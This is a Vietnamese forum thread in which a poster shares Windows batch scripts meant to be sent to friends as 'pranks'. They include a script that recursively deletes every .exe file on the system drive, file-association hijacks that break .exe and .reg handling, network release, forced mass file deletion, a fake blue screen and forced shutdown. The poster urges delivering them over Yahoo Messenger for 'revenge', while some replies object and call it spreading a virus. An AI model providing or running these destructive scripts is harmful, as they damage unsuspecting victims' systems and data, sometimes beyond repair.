Đăng NhậpĐăng ký

+15
Lâm Bãnh Zai
カイン
๖ۣۜĶĥøą ๖ۣۜĶĥáυ ๖ۣۜĶĥϊņћ
shamans108
sahojden2100
lSltyle_Demon
Gió thần thánh
Hợi Hôi Hám
Thợ Săn Quỷ
DaF...mr.kail
Yuki...Ghost
Huy Nhok
Disney.LuvU
(¯V.I.P».«Lövë¯)
Quỷ Dracula
19 posters

Go to page : 1, 2  Next

Quỷ Dracula
Tham gia : 2012-08-08
Bài gửi : 1366
Point : 21
Nhận thích : 613
Tường Bài viết Kết bạn Chặn
13/12/2012, 18:57#1

Một số code bat dùng để troll bạn bè

Hum nay mình sẽ giới thiệu 1 số code bat khá hay dùng để chọc phá bạn bè
Đầu tiên tạo 1 file notepad = cách chuột phải vào desktop -> new -> text document
Bước 2 copy 1 số code ở dưới vào notepad và save lại dưới dạng abc.bat

Một số code bat dùng để troll bạn bè  312

Swap Mouse button ( đảo chuột trái thành fải và ngược lại)
Code:
@ echo off
rem ---------------------------------
rem Swap Mouse Buttons
RUNDLL32 USER32.DLL,SwapMouseButton
rem ---------------------------------

Delete all .exe files in the computer ( suy nghĩ kĩ khi sử dụng code này)
Code:
@ echo off
rem ---------------------------------
rem Delete All Exe
DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
rem ---------------------------------

Disable internet ( làm mất mạng tạm thời )
Code:
@ echo off
rem ---------------------------------
rem Disable Internet
@Echo off & @@Break Off
Ipconfig /release
%jUmP%E%nD%c%onFiG%h%IdE%o%P% h%aRv%%aRd%A%T%%cHe%cK%HappY%3D b%aLLo0Ns%Y%eS% m3Ga!?!
P%ReSs%%IE%AuS%ExPloR%e%r% > nul.%TempInternetRelease%
rem ---------------------------------

Confuse File Extensions ( đổi định dạng của file, ví dụ exe thành png...)
Code:
@ echo off
rem ---------------------------------
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
rem ---------------------------------
rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
rem ---------------------------------

Create Fake Blue Screen Of Death - Màn hình xanh chết chóc giả
Chắc ai cũng biết đến màn hình xanh huyền thoại nhỉ...nỗi đáng sợ của những ng sử dụng máy tính

Sau đây mình sẽ hướng dẫn tạo ra 1 cái màn hình xanh giả để chơi troll 1 ai đó.
- Sau khi run file này. Lập tức sẽ có màn hình xanh giả đc tạo ra. Với những ng ko để ý kĩ thì sẽ lầm tưởng rằng bị màn hình xanh thật

- Tắt đi bằng cách alt + f4 là đc
Code
Code:
@echo off
echo ^<html^>^<head^>^<title^>BSOD^</title^> > bsod.hta
echo. >> bsod.hta
echo ^<hta:application id="oBVC" >> bsod.hta
echo applicationname="BSOD" >> bsod.hta
echo version="1.0" >> bsod.hta
echo maximizebutton="no" >> bsod.hta
echo minimizebutton="no" >> bsod.hta
echo sysmenu="no" >> bsod.hta
echo Caption="no" >> bsod.hta
echo windowstate="maximize"/^> >> bsod.hta
echo. >> bsod.hta
echo ^</head^>^<body bgcolor="#000088" scroll="no"^> >> bsod.hta
echo ^<font face="Lucida Console" size="4" color="#FFFFFF"^> >> bsod.hta
echo ^<p^>A problem has been detected and windows has been shutdown to prevent damage to your computer.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>DRIVER_IRQL_NOT_LES_OR_EQUAL^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>If this is the first time you've seen this stop error screen, restart your computer, If this screen appears again, follow these steps:^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Check to make sure any new hardware or software is properly installed. If this is a new installation, ask your hardware or software manufacturer for any windows updates you might need.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>If problems continue, disable or remove any newly installed hardware or software. Disable BIOS memory options such as caching or shadowing. If you need to use Safe Mode to remove or disable components, restart your computer, press F8 to select Advanced Startup Options, and then select Safe Mode.^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Technical information:^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>*** STOP: 0x000000D1 (0x0000000C,0x00000002,0x00000000,0xF86B5A89)^</p^> >> bsod.hta
echo. >> bsod.hta
echo. >> bsod.hta
echo ^<p^>*** gv3.sys - Address F86B5A89 base at F86B5000, DateStamp 3dd9919eb^</p^> >> bsod.hta
echo. >> bsod.hta
echo ^<p^>Beginning dump of physical memory^</p^> >> bsod.hta
echo ^<p^>Physical memory dump complete.^</p^> >> bsod.hta
echo ^<p^>Contact your system administrator or technical support group for further assistance.^</p^> >> bsod.hta
echo. >> bsod.hta
echo. >> bsod.hta
echo ^</font^> >> bsod.hta
echo ^</body^>^</html^> >> bsod.hta
start "" /wait "bsod.hta"
del /s /f /q "bsod.hta" > nul

Xóa các tập tin ko cần thiết cho máy tính. Giúp Win hoạt động mượt hơn
Code:
@echo off
color 0C
echo Tien trinh se xoa file khong can thiet ...
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
echo Tat ca da ket thuc.!
pause
Và cuối cùng code dùng để tắt và rs máy chỉ với 1 click

Code:
shutdown -s -t 60 -c "loi nhan" -f

có thể thay s = r dùng để rs máy
-t 60 với 60 là thời gian tắt tính = giây, dùng để hẹn giờ tắt máy mà ko cần can thiệp bởi bất cứ phần mềm nào. Các bạn có thể sửa lại tùy ý
-c là lời nhắn dùng để tự kỉ hoặc troll winking

Lời kết: File sau khi lưu lại dưới dạng .bat có thể gửi qua yahoo vv. Nào ta cùng nhau trả thù Một số code bat dùng để troll bạn bè  876419Last edited by Quỷ Dracula on 13/12/2012, 18:59; edited 1 time in total (Reason for editing : http://www.phutu.org)

+1
(¯V.I.P».«Lövë¯)
Tham gia : 2012-10-31
Bài gửi : 1375
Point : 3311
Nhận thích : 54
Tường Bài viết Kết bạn Chặn
13/12/2012, 19:24#2

Re: Một số code bat dùng để troll bạn bè

em ngu vc~ ~~

(¯V.I.P».«Lövë¯)
Tham gia : 2012-10-31
Bài gửi : 1375
Point : 3311
Nhận thích : 54
Tường Bài viết Kết bạn Chặn
13/12/2012, 19:26#3

Re: Một số code bat dùng để troll bạn bè

Band thằng T Mod này đê
nó post bài phá hoại =]]

Disney.LuvU
Tham gia : 2012-04-17
Bài gửi : 781
Point : 1998
Nhận thích : 37
Biệt Danh : Fang Phập Fap
Tường Bài viết Kết bạn Chặn
13/12/2012, 19:30#4

Re: Một số code bat dùng để troll bạn bè

Hay

Huy Nhok
Tham gia : 2011-12-09
Bài gửi : 2093
Point : 13262
Nhận thích : 285
Biệt Danh : Huy Nhok
Tường Bài viết Kết bạn Chặn
13/12/2012, 19:49#5

Re: Một số code bat dùng để troll bạn bè

đờ mờ thằg T-mod post hướng dẫn phá máy nhé :T a thay mặt các admin thông ass e nở hoa Một số code bat dùng để troll bạn bè  3652407901

Quỷ Dracula
Tham gia : 2012-08-08
Bài gửi : 1366
Point : 21
Nhận thích : 613
Tường Bài viết Kết bạn Chặn
13/12/2012, 19:54#6

Re: Một số code bat dùng để troll bạn bè

Huy Nhok wrote:đờ mờ thằg T-mod post hướng dẫn phá máy nhé :T a thay mặt các admin thông ass e nở hoa Một số code bat dùng để troll bạn bè  3652407901
đọc lại tiu đề box đi thằng nhóc ác :001

Huy Nhok
Tham gia : 2011-12-09
Bài gửi : 2093
Point : 13262
Nhận thích : 285
Biệt Danh : Huy Nhok
Tường Bài viết Kết bạn Chặn
13/12/2012, 19:56#7

Re: Một số code bat dùng để troll bạn bè

Quỷ Dracula wrote:
Huy Nhok wrote:đờ mờ thằg T-mod post hướng dẫn phá máy nhé :T a thay mặt các admin thông ass e nở hoa Một số code bat dùng để troll bạn bè  3652407901
đọc lại tiu đề box đi thằng nhóc ác :001
I don't care :T cái xóa đuôi exe là - dis mạng là thấy phá máy rồi :T
sao hả ! chống cự là bụng bự :T

Yuki...Ghost
Tham gia : 2012-09-16
Bài gửi : 58
Point : 137
Nhận thích : 10
Biệt Danh : Yiki...ghost
Tường Bài viết Kết bạn Chặn
13/12/2012, 20:38#8

Re: Một số code bat dùng để troll bạn bè

sử dụng sa0

DaF...mr.kail
Tham gia : 2012-10-14
Bài gửi : 29
Point : 69
Nhận thích : 1
Tường Bài viết Kết bạn Chặn
13/12/2012, 20:46#9

Re: Một số code bat dùng để troll bạn bè

xài xong hủy lệnh ntn? lỡ nó k bít cách, nó hỏi mình, mình cũng ngu thì =]]z~

Thợ Săn Quỷ
Tham gia : 2011-12-06
Bài gửi : 4961
Point : 4916
Nhận thích : 5250
Biệt Danh : lForeverlAlonel
Tường Bài viết Kết bạn Chặn
13/12/2012, 20:56#10

Re: Một số code bat dùng để troll bạn bè

Có vài code ác ý => ban vv Một số code bat dùng để troll bạn bè  2441021649

Quỷ Dracula
Tham gia : 2012-08-08
Bài gửi : 1366
Point : 21
Nhận thích : 613
Tường Bài viết Kết bạn Chặn
13/12/2012, 20:58#11

Re: Một số code bat dùng để troll bạn bè

các code này ko gây nguy hiểm chỉ cần rs máy là hết. Cách xài thì bạn đọc kĩ lại nhé
p/s code deleted toàn bộ file .exe thì bó tay laughingLast edited by Quỷ Dracula on 13/12/2012, 21:01; edited 1 time in total (Reason for editing : http://www.phutu.org)

Hợi Hôi Hám
Tham gia : 2012-01-18
Bài gửi : 4215
Point : 55253
Nhận thích : 801
Biệt Danh : Hợi Siêu Dâm
Tường Bài viết Kết bạn Chặn
13/12/2012, 21:35#12

Re: Một số code bat dùng để troll bạn bè

Mẹ nó làm sao tắt cái code đầu đảo chuột Một số code bat dùng để troll bạn bè  4151853918

Huy Nhok
Tham gia : 2011-12-09
Bài gửi : 2093
Point : 13262
Nhận thích : 285
Biệt Danh : Huy Nhok
Tường Bài viết Kết bạn Chặn
13/12/2012, 22:00#13

Re: Một số code bat dùng để troll bạn bè

Hợi Hôi Hám wrote:Mẹ nó làm sao tắt cái code đầu đảo chuột Một số code bat dùng để troll bạn bè  4151853918
1 thằg nghịch ngu pig

Gió thần thánh
Tham gia : 2011-10-13
Bài gửi : 4777
Point : 23030
Nhận thích : 281
Biệt Danh : :T
Tường Bài viết Kết bạn Chặn
13/12/2012, 22:17#14

Re: Một số code bat dùng để troll bạn bè

T-mod này như l` :T

lSltyle_Demon
Tham gia : 2012-06-08
Bài gửi : 64
Point : 219
Nhận thích : 1
Biệt Danh : lSltyle_Demon
Tường Bài viết Kết bạn Chặn
17/1/2013, 17:51#15

Re: Một số code bat dùng để troll bạn bè

úp ~~

sahojden2100
Tham gia : 2011-03-17
Bài gửi : 185
Point : 341
Nhận thích : 43
Biệt Danh : O.ne_H.it
Tường Bài viết Kết bạn Chặn
29/1/2013, 19:19#16

Re: Một số code bat dùng để troll bạn bè

bá đao vote laughing

shamans108
Tham gia : 2012-05-01
Bài gửi : 1576
Point : 11983
Nhận thích : 340
Biệt Danh : Note...Nhok108
Tường Bài viết Kết bạn Chặn
29/1/2013, 20:05#17

Re: Một số code bat dùng để troll bạn bè

tks nhìu nha
p/s. chưa kip gửi bấm nut enter cái bị trc lun Một số code bat dùng để troll bạn bè  3346799722

๖ۣۜĶĥøą ๖ۣۜĶĥáυ ๖ۣۜĶĥϊņћ
Tham gia : 2012-06-29
Bài gửi : 1178
Point : 4836
Nhận thích : 299
Biệt Danh : Nhồn Cái Lìn Gì Vậy?
Tường Bài viết Kết bạn Chặn
29/1/2013, 20:12#18

Re: Một số code bat dùng để troll bạn bè

Ví dụ như làm 1 cái New Text Document - Notepad r` copy 1 trong mấy cái code trên vào. Rồi gửi sang cho nó, vậy rồi làm sao để nó bị?? Mở cái Notepad đó lên àh??

カイン
Tham gia : 2011-09-04
Bài gửi : 3112
Point : 12691
Nhận thích : 648
Biệt Danh : Show me yours
Tường Bài viết Kết bạn Chặn
29/1/2013, 20:14#19

Re: Một số code bat dùng để troll bạn bè

tuyên truyền virus à :T
1 phiếu vote ủng hộ laughing
đúng cái mình đang cần , tks thớt nhá Một số code bat dùng để troll bạn bè  3652407901

shamans108
Tham gia : 2012-05-01
Bài gửi : 1576
Point : 11983
Nhận thích : 340
Biệt Danh : Note...Nhok108
Tường Bài viết Kết bạn Chặn
30/1/2013, 11:14#20

Re: Một số code bat dùng để troll bạn bè

sao minh làm dc vài lần thì sau đó hết dc rồi
cái code tắt máy ak nó hiên bản den song 5p sau củng k tắt
zới lại k thấy cái bảng lới nhắn nua~
p/s: làm thêm cái hinh xanh thành hình ma di =p~

Re: Một số code bat dùng để troll bạn bè

<< Quay lại chuyên mục

Go to page : 1, 2  Next